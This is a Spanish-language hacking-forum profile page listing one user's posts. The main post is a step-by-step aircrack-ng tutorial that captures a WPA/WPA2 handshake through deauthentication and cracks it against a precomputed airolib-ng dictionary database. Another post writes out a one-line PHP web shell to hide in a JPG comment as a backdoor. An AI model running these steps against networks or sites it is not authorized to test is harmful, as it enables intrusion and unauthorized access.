Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - KzZiIi3l

#1
Pentesting / Re:Curso Pentesting
Diciembre 11, 2011, 12:34:22 AM
Yo pense qe era Documentacion tipo texto, no videos... mas qe uno los conocia, pero se agradecen igual estan muy interesantes!! Muchas Gracias  ;D
#2
Python / Re:[Guia] Iniciando en Python
Diciembre 08, 2011, 08:39:36 PM
Siempre es bueno leer guias creadas por programadores constantes y eficientes :)
#3
Vale!.. esto me estima ha subir post mas pioneros :D o algo asi  ??? JAJA... XD
#4
OK, thanks ... Ps, bueno aca No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hay unas muy buenas recopilaciones... en tener una wordlist buena recomiendo qe tambien existan con claves reales, no solo palabras, numeros, letras, digitos especiales etc.. porqe tambien va siempre en la logica de la persona qe haga la clave; Aunqe de lo contrario tenga una pass autoconfigurada por el mismo router la marca ó el ISP, por eso mismo caen bien las recopilaciones grandes :D Ten encuenta qe es fuerza bruta con diccionarios, como tu mismo dijiste man "no es mas que un juego de azar", en parte vale algo asi jajaj 1x1.... Todo esto lleva una gran dificultad tediosa de obtener el password.-.
#5
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?> 
#6
Gracias ha ti por comentar! Intentalo y veras como funciona man ;)!
#7
- Hola! Soy nuevo aqui en esta comunidad y este metodo talvez algunos ya lo conoscan, pero estoy seguro qe un poco mas de la mitad no lo conocen; no me gustar repostear cosas qe ya se encuentran en un foro, por eso mismo revise los posts si estaba posteado ó no y por lo visto no habia nada sobre esto  ;D , porsiacaso este articulo yo lo habia posteado antes en DDLR pero lo he modificado un poco y tambien qe esto lo sabia desde BT 3 ó 4, lo qiero recalcar!..

Bueno en fin explico:
-  Esta es otra manera de crackear los Handshake de los Access Point con encryptacion WPA/WPA2 con la tool Airolib-ng , qe se encuentra en el suite de Aircrack-ng ya hace tiempo..; esto tambien se realiza con la ayuda de un buen diccionario!

... La diferencia con el "Proceso Normal" del Crackeo WPA/WPA2, es que crea una Base de Datos y se podria decir qe hace un ataque Pre-computeado apresurando el proceso de busqueda de la contraseña agrupando las palabras de la BD de tal manera dada al handshake, demorandonos asi mucho menos en crackearla, pero ante todo la contraseña se supone qe debe estar el diccionario importado xDD!!, SOLO QE TARDA MUCHO MENOS EN ENCONTRARLA.




Empezamos con los comandos tipicos: (solo ejemplos y bla bla..)

Código: php

airmon-ng start (interfaz)
airodump-ng mon0 [ó si quieren hacen la busqueda más especializada]
airodump-ng -w _ -c _ --bssid _ mon0


___________
*Abrimos otra Terminal:

Código: php

aireplay-ng -0 5 -a _ -c _  mon0



....Esperamos handshake (si no intentanos denuevo el comando)
... y listo
... [Lo importante es obtener el preciado handshake]
si quieren cierran la Terminal.

En la ventana del airodump-ng la frenamos (Con CONTROL+C) y haora ha lo qe vamos...

Airolib-ng

Código: php

airolib-ng crackwpa (ó cualqier otro nombre) --import passwd (Ruta del diccionario) # Importamos el Diccionario.
nano (ó cualqier otro editor) essid (escribimos el essid de la red, guardamos y cerramos) # Creamos el texto ESSID.
airolib-ng crackwpa --import essid (Ruta del archivo "essid" creado con kate anteriormente) # Importamos la ESSID.
airolib-ng crackwpa --clean all # Limpiamos.
airolib-ng crackwpa --stats # Vemos lo qe hay.
airolib-ng crackwpa --batch # Computeamos el ataque.
airolib-ng crackwpa --verify all # y verificamos todo...
clear ... xDD



___________(Ya qe esta todo listo.. ordenado y limpio :D, procedemos al Crackeo en sí)

aircrack-ng -r crackwpa (nombre del archivo).cap


Y talvez con suerte un...

KEY FOUND! [--:--:--:--:--:--:--:--:--:--:--] (ASCII:--------- ) [& nos sentimos realizados por unos segundos...]

Gracias!! Espero qe les sirva de utilidad... Saludos!

...::Fin::...